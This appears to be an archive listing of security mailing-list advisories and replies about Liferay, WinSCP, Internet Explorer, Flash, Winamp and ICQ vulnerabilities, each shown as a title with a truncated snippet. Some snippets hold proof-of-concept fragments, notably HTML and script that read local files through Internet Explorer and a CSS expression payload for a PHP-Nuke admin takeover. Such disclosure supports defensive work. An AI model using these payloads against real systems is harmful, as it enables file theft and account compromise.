Guests can view names and emailadresses of all Liferay users in liferay 6.1

Guests can view names and emailadresses of all Liferay users in liferay 6.1 Description: Liferay Portal is an enterprise portal written in Java As an unauthenticated user it is possible to retrieve the names and email adresses of all Liferay users. To retrieve a list of all users simply issue

Liferay 6.1 can be compromised without having an account on the portal

Liferay 6.1 can be compromised without having an account on the portal Description: Liferay Portal is an enterprise portal written in Java Liferay in it's default configuration exposes a number of remotely accessible webservices. Access to these services is restricted by an ip block. It is

Liferay users can assign themselves to organizations, leading to possible privilege escalation

Liferay users can assign themselves to organizations, leading to possible privilege escalation Description: Liferay Portal is an enterprise portal written in Java Due to insufficient permission checking in the updateOrganizations method of UserService any user can assign hem or her self to any

Specially crafted Json service request allows full control over a Liferay portal instance

Specially crafted Json service request allows full control over a Liferay portal instance Description: Liferay Portal is an enterprise portal written in Java By doing a single http request you can reconfigure Liferay to use a remote Memcached cache instead of it's own cache.

Liferay 6.1 can be compromised in its default configuration

Liferay 6.1 can be compromised in its default configuration Description: Liferay Portal is an enterprise portal written in Java By utilizing the json webservices exposed by the platform you can register a new user with any role in the system, including the built in administrator role. The

Specially crafted webdav request allows reading of local files on liferay 6.0.x

Specially crafted webdav request allows reading of local files on liferay 6.0.x Description: Liferay Portal is an enterprise portal written in Java By creating a specially crafted webdav request that contains an external entity it is possible to read files from a liferay server. and echo these

WinSCP - URI Handler Command Switch Parsing

WinSCP - URI Handler Command Switch Parsing About winscp : WinSCP is an open source freeware SFTP client for Windows using SSH. Legacy SCP protocol is also supported. Its main function is safe copying of files between a local and a remote computer. Versions affected : It was tested on WinSCP

Re: IE - reading local files

I don't know if anybody pointed it out before... yes i did, see http://msgs.securepoint.com/cgi-bin/get/bugtraq0302/12.html - Original Message - From: Adam [ckkl] [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, March 23, 2003 3:10 AM Subject: IE - reading local files Hello,

internet explorer local file reading

We allready knew pressing the back button on IE is dangerous (http://online.securityfocus.com/archive/1/267561) So it wont come as a total shock that so is clicking a link :) The problem lies in the dragdrop method that was added as a method on nearly all HTML elements in ie5.5 This method makes

Re: How to execute programs with parameters in IE - Sandblad advisory #10

method caching bugs. Very nice work indeed. I'll cc this to bugtraq for clarity sake -- jelmer - Original Message - From: Andreas Sandblad [EMAIL PROTECTED] To: jelmer [EMAIL PROTECTED] Sent: Friday, November 08, 2002 4:34 PM Subject: Re: How to execute programs with parameters in IE

Re: Vulnerable cached objects in IE (9 advisories in 1)

The external method flaw also seems to affects my ie6 sp1 browser -- jelmer - Original Message - From: GreyMagic Software [EMAIL PROTECTED] To: Bugtraq [EMAIL PROTECTED] Sent: Tuesday, October 22, 2002 5:24 PM Subject: Vulnerable cached objects in IE (9 advisories in 1) GreyMagic

Re: MSIE:SaveRef cracks (VictimWindow).document.write

It throws a permission denied exception on my MSIE 6 SP1 + all patches in place MSIE 6.0.2600. is way old -- jelmer - Original Message - From: Liu Die Yu [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 21, 2002 4:16 PM Subject: MSIE:SaveRef cracks (VictimWindow

Re: MSIE:SaveRef cracks (VictimWindow).document.write

It throws a permission denied exception on my MSIE 6 SP1 + all patches in place MSIE 6.0.2600. is way old -- jelmer - Original Message - From: Liu Die Yu [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 21, 2002 4:16 PM Subject: MSIE:SaveRef cracks (VictimWindow

Flash player can read local files

The following message apperently bounced the first time i send it :s Flash player can read local files Description There is a flaw in the macromedia flash player wich allows reading and sending of local files The flaw lies in the fact that when a flash movie is loaded from a remote smb share

Re: MSIEv6 % encoding causes a problem again

the content is under your control. Thus you can create fake login screens etc without raising suspicion -- jelmer - Original Message - From: Dave Ahmad [EMAIL PROTECTED] To: Liu Die Yu [EMAIL PROTECTED] Sent: Wednesday, September 04, 2002 6:32 PM Subject: Re: MSIEv6 % encoding causes

Re: Internet explorer can read local files

) { } } /script - Original Message - From: Avleen Vig [EMAIL PROTECTED] To: Jelmer [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Saturday, August 17, 2002 8:31 PM Subject: Re: Internet explorer can read local files On Sat, 17 Aug 2002, Jelmer wrote: html head base href=file

Internet explorer can read local files

:\jelmer.xml html head base href=file:///C:/ /head body applet code=com.ms.xml.dso.XMLDSO.class width=100% height=50 id=xmldso MAYSCRIPT=true PARAM NAME=url VALUE=jelmer.xml /applet script language=javascript setTimeout(showIt(),2000); function showIt() { var jelmer = xmldso.getDocument

Enableing java logging in MSIE is dangerous

\javalog.txt Those who have been following HTTP-EQUIV's discovery will realise that this is extremely dangerous, as it will allow execution of arbitrary code However since this feature is disabled by default it can be considered to be very low risk -- jelmer

RETRY : newly released winamp 3 fails to address serious execution of arbitrary code issue when combined with MSIE6

This one was missed by security focus . Lets try again -- jelmer - Original Message - From: Jelmer [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, August 11, 2002 1:28 AM Subject: newly released winamp 3 fails to address serious execution of arbitrary code issue when combined

Re: PHP-Nuke v5.6 - Users can compromise admin accts.

='http://kuperus.xs4all.nl' : 0 ); word-wrap : expression(this.done=true); test/a its a bit messy but gets the job done. It works by using css expressions (a feature afaik native to Internet explorer) in the style tag. -- jelmer - Original Message - From: -delusion- [EMAIL PROTECTED

Macromedia Flash plugin can read local files

.---..-- / \ __ /-- / / \( )/- // ' \/ ` --- / // :: --- // / / /`'-- // //..\\ UUUU '//||\\` Macromedia Flash plugin can read local files Description : Macromedia

Re: Winhelp32 Remote Buffer Overrun

several months and as far as I know they are still looking. -- jelmer - Original Message - From: Next Generation Insight Security Research Team [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, August 02, 2002 3:59 AM Subject: Winhelp32 Remote Buffer Overrun -BEGIN

WINAMP also allows execution of arbitrary code (probably a lot more programs aswell)

It would seem that I opened up a can of worms when i created my icq + msie advisory the other day Wich presented a new way to execute arbitrary code on a users machine winamp is equally vulnerable Winamps starts skin files with the extention wsz and the mime type interface/x-winamp-skin

ICQ and MSIE allow execution of arbitrary code

Outline qoute I was about to put on a home page right after I discovered it [and still had a hope that I will be that one who will finally destroy the world :]: /quote Well i dont know if it will destroy the world, but sure enough it's enough to destory a small portion off it :) Actually i